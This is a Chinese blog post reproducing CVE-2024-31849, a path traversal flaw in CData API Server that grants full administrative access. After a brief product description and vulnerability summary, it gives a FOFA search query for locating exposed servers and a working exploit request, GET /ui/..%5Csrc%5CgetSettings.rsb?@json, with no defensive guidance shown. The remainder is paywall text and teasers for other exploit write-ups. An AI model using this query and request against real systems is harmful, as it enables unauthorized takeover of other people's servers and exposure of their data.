【漏洞复现】CData API Server 路径遍历漏洞(CVE-2024-31849)

最新推荐文章于 2024-09-23 20:05:28 发布
最新推荐文章于 2024-09-23 20:05:28 发布
阅读量176 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 分布式 云原生 服务器 zookeeper 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/138540282
版权
本文介绍了CData API Server的安全漏洞,该漏洞允许攻击者通过路径遍历进行攻击,获取管理权限。内容包括产品简介、漏洞概述、复现步骤以及影响范围。
摘要由CSDN通过智能技术生成

0x01 产品简介

CData API Server是CData公司的一个强大的数据连接平台,旨在帮助企业轻松地访问、整合和分析各种数据源。

0x02 漏洞概述

CData API Server 23.4.8846之前版本存在安全漏洞,该漏洞源于存在路径遍历漏洞。攻击者可利用该漏洞获得对应用程序的完全管理访问权限。

0x03 测绘语句

fofa: title="CData"

0x04 漏洞复现

GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1

Host:

Referer:http(https)://xxxx

0x05

了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
专栏目录
订阅专栏
CVE-2021-21402漏洞复现Jellyfin任意文件读取
weixin_52834047的博客
05-10 2239
1.漏洞描述 Jellyfin是一个自由软件媒体系统,在10.7.1版之前的Jellyfin中,攻击者可以通过精心构造的请求读取Jellyfin服务器端的任意文件,当使用Windows主机作为操作系统时,此问题将变得跟加普遍,该漏洞已在10.7.1版本中修复。 2.影响版本 Jellyfin<10.7.1 3.复现步骤 1.根据关键词在fofa上搜索包含该漏洞的网站 2.访问网站用burpsuite抓包 3.构造URL请求头 jellyfin.db将从服务器下载带有密码的...
CData API Server全面且文档完整的API
q2315702359的博客
11-01 373
API Server API Server提供了一个轻量级Web应用程序,允许用户构建和发布数据API,而无需定制开发需求。通过简单的单击和拖动配置,用户可以设计和设置对流行应用程序的访问,如Microsoft Power BI、Salesforce Lightning Connect、SharePoint外部列表、Excel、PowerPivot等。无论您的企业是希望使用API来促进增长,以构建一个庞大的第三方生态系统,还是正在为It部门和数据管理创建解决方案,API服务器都是您的解决方案。
CData Arc v22API工作流
q2315702359的博客
10-31 232
无论您的特定行业EDI需求如何,CData Arc都支持所有主要EDI标准和协议,包括X12 FHIR、HL7、X12和EDIFACT。CData Arc是针对AS2消息传递和文件传输的Drummond认证,它支持主要的MFT标准,如AS2、AS4、OFTP、SFTP等。使用一个预先构建的行业工作流库,将您的贸易伙伴从外部与您的所有文档、应用程序和流程连接起来,从而使端到端的集成更加容易。创建快速、简单、安全的EDI MFT、EDI和API工作流,与您的云或本地应用程序集成。API以及应用程序集成。
安全—K8S API Server 未授权访问
王嘟嘟的博客
10-30 2347
通常情况下k8s会有两个API服务,一个是8080,还有一个是6443。6443提供https服务,并且不对外开放,支持认证和授权服务,默认情况下8080是不启动的。
angular api管理_使用Angular和API服务器显示相关表中的数据
danpu0978的博客
05-25 594
angular api管理 Angular是基于Angular JS并扩展其原理的动态Web应用程序的更新框架。 CData API Server使您可以为80多个数据源(包括本地数据库和基于云的数据库)生成REST API。 本文将逐步设置CData API服务器 ,以为QuickBooks Online数据创建基于OData的REST API,并创建一个可以实时访问QuickBooks On...
weblogic CVE-2017-10271漏洞复现
qq_68581192的博客
05-24 1155
名称:weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)原理:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者可以构造XML语句,上传一句话木马,getshell。
Weblogic漏洞复现之远程代码执行(CVE-2020-14882)
hhsjjsj的博客
08-07 1027
全称为Oracle WebLogic Server,是基于JavaEE服务器的中间件。
CVE-2019-0193:Apache Solr 远程命令执行漏洞
冠霖L的博客
11-02 1891
0x00 漏洞介绍 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置...
Zimbra CVE-2019-9670 XXE + CVE-2019-9621 SSRF 漏洞复现
部分学习记录
03-12 2395
炒冷饭复现cve-2019-9670 xxe + cve-2019-9621 ssrf
漏洞复现—Weblogic CVE-2017-10271/CVE-2018-2628/CVE-2018-2894/CVE-2020-14882/ssrf/weak_password
weixin_45556536的博客
11-27 2038
这里写目录标题基础知识漏洞原理涉及版本漏洞特征漏洞复现CVE-2017-10271 'wls-wsat' XMLDecoder 反序列化漏洞CVE-2018-2628 Weblogic T3协议反序列化漏洞CVE-2018-2894 Weblogic任意文件上传漏洞CVE-2020-14882 weblogic 未授权命令执行漏洞漏洞修复 基础知识 Weblogic是oracle推出的application server,由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性
CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞
weixin_45694388的博客
07-09 5253
漏洞产生原因: CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 涉及版本: 10.3.6.0.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0 环境搭建: vulhub 工具利用: 检测: 工具:weblogicScanner
Weblogic漏洞复现——XML Decoder(CVE-2017-10271)
AmyBaby00的博客
12-11 417
一、漏洞描述: CVE-2017-10271漏洞产生的原因是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 影响版本:10.3.6.0,12.1.3.0.0,12.2.1.1.0 二、环境搭建...
CVE-2024-1112 Resource Hacker 缓冲区溢出分析
信息安全
09-23 861
CVE-2024-1112 是 Resource Hacker 软件的一个缓冲区溢出漏洞。该漏洞存在于版本 3.6.0.92 中。由于软件在处理命令行中的文件路径时未对文件字符串长度进行限制,过长的字符串参数导致内存被过度写入,从而引发缓冲区溢出。
安卓开发中,可以反射去换肤,那么我们应该也可以使用反射去串改我们的程序,作为开发者,我们如何保证我们自己的应用的安全呢?
qq_43664361的博客
09-22 499
在安卓开发中,虽然反射提供了强大的动态操作能力,包括访问和修改类、接口、字段以及方法,但这也为潜在的恶意攻击者提供了篡改程序的可能性。作为开发者,我们需要采取一系列措施来确保自己应用的安全,防止反射被用于非法目的。
【中关村在线-注册/登录安全分析报告】
最新发布
09-23 867
中关村在线(ZOL)创立于1999年,深耕科技垂直领域23年,致力于新消费势力生活科技商品第一导购平台 ,专业高质量内容的提供者。以用户第一为导向,帮用户买好产品,帮客户卖好产品为使命利用专业领先内容,帮助用户更好、更快的选购产品, 通过产品解析、产品点评、问答口碑、对接电商,简化路径、产品评测完善+ 种草导购推荐等环节,让用户全面了解每一款产品性能,帮助用户更精准、更快捷的选购科技产品。
如何检测出来这个ip是共享ip不安全
KookeeyLena8的博客
09-23 460
检测一个IP是否为共享IP以及其安全性可以通过以下几种方法和工具来进行分析。共享IP通常是指多个用户共享一个IP地址,常见于公共代理服务器、VPN服务或数据中心IP。如果你想评估一个IP是否为共享IP以及其安全性,以下方法和工具可以帮助你进行检测和分析。
数据保护从现在开始:如何抵御 .[RestoreBackup@cock.li].SRC 勒索病毒
数据恢复研究℃
09-20 1083
通过综合采取以上预防措施,可以显著降低感染 .[RestoreBackup@cock.li].SRC 、[chewbacca@cock.li].SRC勒索病毒的风险。保持警惕、定期备份数据以及更新安全防护措施是确保数据安全的重要策略。预防永远胜于治疗,积极的安全态度是抵御网络攻击的最佳保障。以下是2024常见传播的勒索病毒,表明勒索病毒正在呈现多样化以及变种迅速地态势发展。
黎巴嫩BP机爆炸事件启示录:我国应加快供应链安全立法
09-21 1246
据报道,当地时间9月17日下午,黎巴嫩首都贝鲁特以及黎巴嫩东南部和东北部多地都发生了BP机爆炸事件。当时的统计数据显示,爆炸造成9人死亡,约2800人受伤。9月18日,死亡人数上升到11人,受伤人数超过4000。目前,整个事件仍在发酵之中,关于BP机是谁制造、谁运输、谁在其中动了手脚还在持续探索之中。这一事件也引发了人们对于供应链安全的广泛关注。供应链的任何环节,包括产品的源头、生产环节、运输过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值